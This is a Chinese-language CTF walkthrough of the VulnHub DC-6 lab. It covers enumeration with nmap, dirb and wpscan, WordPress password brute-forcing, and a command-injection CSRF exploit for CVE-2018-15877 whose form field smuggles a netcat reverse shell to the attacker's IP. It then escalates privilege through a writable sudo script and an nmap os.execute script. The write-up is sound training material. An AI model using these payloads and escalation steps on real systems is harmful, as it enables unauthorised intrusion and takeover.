DC-6 | Lluna's Pure land.

0x00.官网描述

DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
This isn’t an overly difficult challenge so should be great for beginners.
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.

0x01.老规矩nmap

可以发现1为网关，2为宿主机，6为kali，那么3就是我们的受害者

root@JIYE:~/tmp/dc6# nmap -sP 192.168.1.0/24 -oN nmap.sP
# Nmap 7.80 scan initiated Thu Aug 27 02:09:08 2020 as: nmap -sP -oN nmap.sP 192.168.1.0/24
Nmap scan report for 192.168.1.1
Host is up (0.0028s latency).
MAC Address: 68:D1:BA:1F:FD:48 (Shenzhen Youhua Technology)
Nmap scan report for 192.168.1.2
Host is up (0.00040s latency).
MAC Address: 50:5B:C2:8C:BE:A5 (Liteon Technology)
Nmap scan report for 192.168.1.3
Host is up (0.00031s latency).
MAC Address: 00:0C:29:2B:C3:13 (VMware)
Nmap scan report for 192.168.1.6
Host is up.
# Nmap done at Thu Aug 27 02:09:10 2020 -- 256 IP addresses (4 hosts up) scanned in 2.06 seconds

0x02.继续nmap扫描服务及端口

可以发现开放了22/80端口，且wordpress的版本为5.1.1

root@JIYE:~/vulnhub/dc6# nmap -sC -sV -v 192.168.1.3 -oN nmap.demo
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 03:05 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 03:05
Completed NSE at 03:05, 0.00s elapsed
Initiating NSE at 03:05
Completed NSE at 03:05, 0.00s elapsed
Initiating NSE at 03:05
Completed NSE at 03:05, 0.00s elapsed
Initiating ARP Ping Scan at 03:05
Scanning 192.168.1.3 [1 port]
Completed ARP Ping Scan at 03:05, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 03:05
Scanning wordy (192.168.1.3) [1000 ports]
Discovered open port 80/tcp on 192.168.1.3
Discovered open port 22/tcp on 192.168.1.3
Completed SYN Stealth Scan at 03:05, 0.07s elapsed (1000 total ports)
Initiating Service scan at 03:05
Scanning 2 services on wordy (192.168.1.3)
Completed Service scan at 03:05, 6.08s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.1.3.
Initiating NSE at 03:05
Completed NSE at 03:05, 0.63s elapsed
Initiating NSE at 03:05
Completed NSE at 03:05, 0.02s elapsed
Initiating NSE at 03:05
Completed NSE at 03:05, 0.00s elapsed
Nmap scan report for wordy (192.168.1.3)
Host is up (0.000092s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 5.1.1
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Wordy &#8211; Just another WordPress site
|_https-redirect: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:2B:C3:13 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 03:05
Completed NSE at 03:05, 0.00s elapsed
Initiating NSE at 03:05
Completed NSE at 03:05, 0.00s elapsed
Initiating NSE at 03:05
Completed NSE at 03:05, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.28 seconds
           Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.036KB)
root@JIYE:~/vulnhub/dc6#

0x03.发现80端口，直接访问

1.发现无法打开且重定向到wordy

2.修改hosts文件，再次访问，发现提到了插件

3.扫描wordpress目录

root@JIYE:~/vulnhub/dc6# dirb http://wordy
-----------------
DIRB v2.22    
By The Dark Raver
-----------------
START_TIME: Thu Aug 27 02:19:37 2020
URL_BASE: http://wordy/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612                                                          
---- Scanning URL: http://wordy/ ----
+ http://wordy/index.php (CODE:301|SIZE:0)                                           
+ http://wordy/server-status (CODE:403|SIZE:293)                                     
==> DIRECTORY: http://wordy/wp-admin/                                               
==> DIRECTORY: http://wordy/wp-content/                                             
==> DIRECTORY: http://wordy/wp-includes/                                             
+ http://wordy/xmlrpc.php (CODE:405|SIZE:42)                                         
---- Entering directory: http://wordy/wp-admin/ ----
+ http://wordy/wp-admin/admin.php (CODE:302|SIZE:0)                                 
==> DIRECTORY: http://wordy/wp-admin/css/                                          
==> DIRECTORY: http://wordy/wp-admin/images/                                         
==> DIRECTORY: http://wordy/wp-admin/includes/   
+ http://wordy/wp-admin/index.php (CODE:302|SIZE:0)                                 
==> DIRECTORY: http://wordy/wp-admin/js/
==> DIRECTORY: http://wordy/wp-admin/maint/                                         
==> DIRECTORY: http://wordy/wp-admin/network/                                       
==> DIRECTORY: http://wordy/wp-admin/user/                                           
---- Entering directory: http://wordy/wp-content/ ----
+ http://wordy/wp-content/index.php (CODE:200|SIZE:0)                               
==> DIRECTORY: http://wordy/wp-content/plugins/                                     
==> DIRECTORY: http://wordy/wp-content/themes/                                      
---- Entering directory: http://wordy/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)                                   
---- Entering directory: http://wordy/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)                                   
---- Entering directory: http://wordy/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://wordy/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://wordy/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)                                   
---- Entering directory: http://wordy/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://wordy/wp-admin/network/ ----
+ http://wordy/wp-admin/network/admin.php (CODE:302|SIZE:0)                         
+ http://wordy/wp-admin/network/index.php (CODE:302|SIZE:0)                         
---- Entering directory: http://wordy/wp-admin/user/ ----
+ http://wordy/wp-admin/user/admin.php (CODE:302|SIZE:0)                             
+ http://wordy/wp-admin/user/index.php (CODE:302|SIZE:0)                             
---- Entering directory: http://wordy/wp-content/plugins/ ----
+ http://wordy/wp-content/plugins/index.php (CODE:200|SIZE:0)                       
---- Entering directory: http://wordy/wp-content/themes/ ----
+ http://wordy/wp-content/themes/index.php (CODE:200|SIZE:0)
-----------------
END_TIME: Thu Aug 27 02:20:11 2020
DOWNLOADED: 32284 - FOUND: 12
root@JIYE:~/vulnhub/dc6#

5.扫描用户

发现五个用户，admin,jens,graham,mark,sarah

root@JIYE:~/vulnhub/dc6# wpscan --url wordy -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.4
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://wordy/ [192.168.1.3]
[+] Started: Thu Aug 27 03:27:20 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://wordy/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://wordy/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://wordy/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
 | Found By: Rss Generator (Passive Detection)
 |  - http://wordy/index.php/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
 |  - http://wordy/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://wordy/wp-content/themes/twentyseventeen/
 | Last Updated: 2020-08-11T00:00:00.000Z
 | Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.4
 | Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1, Match: 'Version: 2.1'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <====================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jens
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] graham
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] mark
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] sarah
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Thu Aug 27 03:27:23 2020
[+] Requests Done: 59
[+] Cached Requests: 6
[+] Data Sent: 13.316 KB
[+] Data Received: 640.55 KB
[+] Memory used: 176.484 MB
[+] Elapsed time: 00:00:02
root@JIYE:~/vulnhub/dc6#

0x04.爆破web application

1.生成用户字典

root@JIYE:~/vulnhub/dc6# cat user.txt
dmin
jens
graham
mark
sarah
root@JIYE:~/vulnhub/dc6#

2.生成密码字典

1	root@JIYE:~/vulnhub/dc6#cat /usr/share/wordlists/rockyou.txt \| grep k01 > passwords.txt

3.爆破

发现mark用户密码：helpdesk01

root@JIYE:~/vulnhub/dc6# wpscan --url wordy -U user.txt -P passwords.txt 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

Trying graham / !lak019b Time: 00:02:30 <======================================================            > (12547 / 15215) 82.46%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: mark, Password: helpdesk01

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Thu Aug 27 03:38:29 2020
[+] Requests Done: 12572
[+] Cached Requests: 33
[+] Data Sent: 5.874 MB
[+] Data Received: 7.392 MB
[+] Memory used: 232.938 MB
[+] Elapsed time: 00:02:33
root@JIYE:~/vulnhub/dc6#

0x05.登入，手动爬虫

发现一个监视插件

前文说插件是安全的，下面查找是否有漏洞

发现存在经过身份验证的命令注入漏洞

root@JIYE:~/vulnhub/dc6# searchsploit Activity Monitor
---------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                  |  Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Activity Monitor 2002 2.6 - Remote Denial of Service                                                            | windows/dos/22690.c
RedHat Linux 6.0/6.1/6.2 - 'pam_console' Monitor Activity After Logout                                          | linux/local/19900.c
WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection                        | php/webapps/45274.html
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
root@JIYE:~/vulnhub/dc6#

0x06.查看45274.html说明

root@JIYE:~/vulnhub/dc6# cp /usr/share/exploitdb/exploits/php/webapps/45274.html .
root@JIYE:~/vulnhub/dc6# ls
45274.html  48724.txt  nmap.A  nmap.demo  nmap.sP  passwords.txt  user.txt
root@JIYE:~/vulnhub/dc6# cat 45274.html 
<!--
About:
===========
Component: Plainview Activity Monitor (Wordpress plugin)
Vulnerable version: 20161228 and possibly prior
Fixed version: 20180826
CVE-ID: CVE-2018-15877
CWE-ID: CWE-78
Author:
- LydA(c)ric Lefebvre (https://www.linkedin.com/in/lydericlefebvre)

Timeline:
===========
- 2018/08/25: Vulnerability found
- 2018/08/25: CVE-ID request
- 2018/08/26: Reported to developer
- 2018/08/26: Fixed version
- 2018/08/26: Advisory published on GitHub
- 2018/08/26: Advisory sent to bugtraq mailing list

Description:
===========
Plainview Activity Monitor Wordpress plugin is vulnerable to OS
command injection which allows an attacker to remotely execute
commands on underlying system. Application passes unsafe user supplied
data to ip parameter into activities_overview.php.
Privileges are required in order to exploit this vulnerability, but
this plugin version is also vulnerable to CSRF attack and Reflected
XSS. Combined, these three vulnerabilities can lead to Remote Command
Execution just with an admin click on a malicious link.

/*
Plainview活动监视器Wordpress插件易受操作系统攻击
允许攻击者远程执行的命令注入
底层系统上的命令。应用程序传递用户提供的不安全
数据到ip参数进入活动_概述.php.
攻击此漏洞需要特权，但是
这个插件版本也容易受到CSRF攻击和反射
XSS公司。综合起来，这三个漏洞可以导致远程命令
只需通过管理员点击恶意链接即可执行。
*/
References:
===========
https://github.com/aas-n/CVE/blob/master/CVE-2018-15877/

PoC:
-->

<html>
  <!--  Wordpress Plainview Activity Monitor RCE
        [+] Version: 20161228 and possibly prior
        [+] Description: Combine OS Commanding and CSRF to get reverse shell
        [+] Author: LydA(c)ric LEFEBVRE
        [+] CVE-ID: CVE-2018-15877
        [+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell
        [+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well
  -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" />
      <input type="hidden" name="lookup" value="Lookup" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>root@JIYE:~/vulnhub/dc6#

修改POC

<html>
  <!--  Wordpress Plainview Activity Monitor RCE
        [+] Version: 20161228 and possibly prior
        [+] Description: Combine OS Commanding and CSRF to get reverse shell
        [+] Author: LydA(c)ric LEFEBVRE
        [+] CVE-ID: CVE-2018-15877
        [+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell
        [+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well
  -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http:wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="ip" value="google.fr| nc 192.168.1.6 9999 -e /bin/bash" />
      <input type="hidden" name="lookup" value="Lookup" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>root@JIYE:~/vulnhub/dc6#

0x07.反弹shell

1.kali监听

1	root@JIYE:~# nc -nvlp 9999

2.firefox打开

1	root@JIYE:~/vulnhub/dc6# firefox 45274.html

点击，get shell

root@JIYE:~# nc -nvlp 9999
listening on [any] 9999 ...
connect to [192.168.1.6] from (UNKNOWN) [192.168.1.3] 58196
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

3.升级shell

1 2	python -c 'import pty;pty.spawn("/bin/bash")' www-data@dc-6:/var/www/html/wp-admin$

4.再次升级为交互shell

root@JIYE:~# stty raw -echo
root@JIYE:~# nc -nvlp 9999

www-data@dc-6:/var/www/html/wp-admin$ 
www-data@dc-6:/var/www/html/wp-admin$ 
www-data@dc-6:/var/www/html/wp-admin$ whoami
www-data
www-data@dc-6:/var/www/html/wp-admin$

0x08.提权

1使用sudo -l 发现需要密码

www-data@dc-6:/var/www/html$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for www-data: 
Sorry, try again

2.查看其他用户家目录文件

发现graham密码：GSo7isUM1D4

www-data@dc-6:/home$ ls *
graham:

jens:
backups.sh

mark:
stuff

sarah:
www-data@dc-6:/home$ cat jens/backups.sh 
#!/bin/bash
tar -czf backups.tar.gz /var/www/html
www-data@dc-6:/home$ cd mark/stuff/
www-data@dc-6:/home/mark/stuff$ ls
things-to-do.txt
www-data@dc-6:/home/mark/stuff$ cat things-to-do.txt 
Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement
www-data@dc-6:/home/mark/stuff$

graham登入

www-data@dc-6:/home/mark/stuff$ su graham
Password: 
graham@dc-6:/home/mark/stuff$ whoami
graham

sudo -l，发现/home/jens/backups.sh可以进行利用

graham@dc-6:~$ sudo -l
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh
graham@dc-6:~$

修改backups.sh进行利用，得到jens用户

graham@dc-6:/home/jens$ ls -l
total 4
-rwxrwxr-x 1 jens devs 61 Aug 27 19:06 backups.sh
graham@dc-6:/home/jens$ cat backups.sh 
#!/bin/bash
#tar -czf backups.tar.gz /var/www/html
/bin/bash
graham@dc-6:/home/jens$ sudo -u jens ./backups.sh 
jens@dc-6:~

sudo -l发现nmap可以进行提权

jens@dc-6:~$ sudo -l
Matching Defaults entries for jens on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jens may run the following commands on dc-6:
    (root) NOPASSWD: /usr/bin/nmap
jens@dc-6:~$

3.nmap提权参考

jens@dc-6:~$ echo 'os.execute("/bin/bash")' > CTF
jens@dc-6:~$ sudo -u root nmap --script=CTF

Starting Nmap 7.40 ( https://nmap.org ) at 2020-08-27 19:50 AEST
NSE: Warning: Loading 'CTF' -- the recommended file extension is '.nse'.
root@dc-6:/home/jens# root@dc-6:/home/jens# root@dc-6:/home/jens#

4.这里提权之后不能敲任何命令，所以使用python提权

python -c ‘import pty;pty.spawn(“/bin/bash”)’ // 复制粘贴

root@dc-6:/home/jens# root@dc-6:/home/jens# root@dc-6:/home/jens# 
root@dc-6:/home/jens# 
root@dc-6:/home/jens# 
root@dc-6:/home/jens# 
root@dc-6:/home/jens# 
root@dc-6:/home/jens# ls
backups.sh  CTF
root@dc-6:/home/jens# cd /root
root@dc-6:~# ls
theflag.txt
root@dc-6:~# cat theflag.txt 


Yb        dP 888888 88     88         8888b.   dP"Yb  88b 88 888888 d8b 
 Yb  db  dP  88__   88     88          8I  Yb dP   Yb 88Yb88 88__   Y8P 
  YbdPYbdP   88""   88  .o 88  .o      8I  dY Yb   dP 88 Y88 88""   `"' 
   YP  YP    888888 88ood8 88ood8     8888Y"   YbodP  88  Y8 888888 (8) 


Congratulations!!!

Hope you enjoyed DC-6.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.


root@dc-6:~#